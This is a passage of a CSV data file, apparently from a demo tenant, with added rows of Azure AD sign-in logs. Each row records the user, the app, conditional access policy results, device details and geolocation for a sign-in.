+564,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:42.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,13d705f0-0853-41b3-8735-ec184428f89e,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",449c494d-a40c-4d70-9e55-531948300000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,449c494d-a40c-4d70-9e55-531948300000,SigninLogs,Sucess,32.32146072,34.85319901
+565,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,43d97c82-ebfb-4963-af7c-c7eb1874c336,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0837a9e3-f941-4973-a561-a80d25e12000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0837a9e3-f941-4973-a561-a80d25e12000,SigninLogs,Sucess,36.6404686,-78.26995087
+566,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0823479f-60ad-0000-54b3-364aca3e7be0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",17ea6265-ad23-4765-8c42-0b9f0ba11b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,17ea6265-ad23-4765-8c42-0b9f0ba11b00,SigninLogs,Sucess,33.7984581,-84.38828278
+567,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:31.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e006eaf-bb79-4425-bf10-da8a9a7b9452,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5511ead1-bd0f-42e2-a2c1-d74a239a1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5511ead1-bd0f-42e2-a2c1-d74a239a1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+568,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:48.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d1395072-8972-42fb-9171-d62afcde1a82,Microsoft.aadiam,Microsoft.aadiam,,Ely Abramovitch,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:08,"{'operatingSystem': 'Windows 10', 'deviceId': 'c44a422d-5560-4c92-92f8-d48eac67534b', 'browser': 'Chrome 80.0.3987', 'displayName': 'ELABRAMO-LAP', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c5b94689-796f-4b24-973f-d9d3c9bc5c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.2205696105957, 'latitude': 32.77729034423828}, 'state': 'Hazafon', 'city': 'Bir Al-Maksur'}",none,none,none,none,[],{'errorCode': 0},Ely Abramovitch,43177305-d1dc-4a24-b3a7-81bac53bed4a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c5b94689-796f-4b24-973f-d9d3c9bc5c00,SigninLogs,Sucess,32.77729034,35.22056961
+569,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:11.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,83cec801-ebaf-4cab-b6bf-45417b3a2322,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:10,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",3b8b7938-8760-4109-8029-77e7fb8a4d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3b8b7938-8760-4109-8029-77e7fb8a4d00,SigninLogs,Sucess,32.32146072,34.85319901
+570,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:31.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9bc0141f-3a74-479c-aea2-e3ace2832551,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93d60bd4-ad49-40a5-9c6c-157dd6d11b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93d60bd4-ad49-40a5-9c6c-157dd6d11b00,SigninLogs,Sucess,36.6404686,-78.26995087
+571,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:42.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3f1faf80-febb-4cf8-92ee-c0da166d7d2e,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 